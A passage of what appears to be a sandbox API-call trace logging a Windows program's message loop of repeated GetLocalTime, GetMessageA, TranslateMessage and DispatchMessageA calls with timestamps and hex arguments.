wMilliseconds=0xf6)) [0108.505] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0xf6)) [0108.505] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.516] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.516] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.516] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x101)) [0108.516] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x101)) [0108.516] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.526] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.526] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.526] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x10b)) [0108.526] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x10b)) [0108.526] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.543] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.543] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.543] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x11c)) [0108.543] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x11c)) [0108.543] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.560] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.560] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.560] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x12e)) [0108.561] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x12e)) [0108.561] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.574] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.574] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.574] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x13c)) [0108.574] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x13c)) [0108.575] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.604] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.604] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.604] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x15a)) [0108.605] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x15a)) [0108.605] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.625] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.625] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.625] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x16e)) [0108.625] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x16e)) [0108.625] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.636] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.636] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.636] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x179)) [0108.636] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x179)) [0108.636] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.657] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.657] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.657] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x18e)) [0108.657] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x18e)) [0108.657] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.668] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.668] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.668] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x199)) [0108.668] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x199)) [0108.668] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.689] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.689] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.689] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x1ae)) [0108.689] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x1ae)) [0108.689] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.699] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.699] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.699] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x1b8)) [0108.699] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x1b8)) [0108.699] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.724] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.724] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.724] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x1d1)) [0108.724] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x1d1)) [0108.724] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.732] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.732] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.732] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x1d9)) [0108.732] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x1d9)) [0108.732] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.753] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.753] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.753] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x1ee)) [0108.753] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x1ee)) [0108.753] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.762] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.762] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.762] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x1f7)) [0108.762] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x1f7)) [0108.762] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.781] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.781] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.781] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x20a)) [0108.781] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x20a)) [0108.781] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.792] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.792] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.792] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x215)) [0108.792] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x215)) [0108.792] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.812] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.812] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.812] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x22a)) [0108.812] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x22a)) [0108.813] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.829] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.829] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.829] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x23a)) [0108.829] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x23a)) [0108.829] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.840] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.840] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.840] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x245)) [0108.840] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x245)) [0108.840] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.890] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.890] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.890] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x277)) [0108.890] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x278)) [0108.891] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.901] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.901] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.901] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x282)) [0108.901] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x282)) [0108.901] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.924] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.924] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.924] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x29a)) [0108.924] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x29a)) [0108.925] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.933] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.933] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.934] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x2a3)) [0108.934] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x2a3)) [0108.934] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.955] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.955] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.955] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x2b8)) [0108.955] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x2b8)) [0108.955] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.965] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.965] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.965] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x2c2)) [0108.965] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x2c2)) [0108.965] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.987] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.987] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.987] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x2d8)) [0108.987] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x2d8)) [0108.987] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.998] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.998] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.998] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x2e4)) [0108.999] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x2e4)) [0108.999] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.012] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.012] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.012] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x2f1)) [0109.012] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x2f1)) [0109.012] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.044] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.044] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.044] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x311)) [0109.044] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x311)) [0109.044] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.065] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.065] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.065] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x326)) [0109.065] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x326)) [0109.065] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.076] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.076] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.076] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x331)) [0109.076] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x331)) [0109.076] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.092] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.092] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.092] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x341)) [0109.092] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x342)) [0109.092] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.105] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.105] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.105] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x34e)) [0109.105] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x34e)) [0109.105] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.136] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.136] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.136] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x36e)) [0109.136] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x36e)) [0109.137] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.157] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.157] 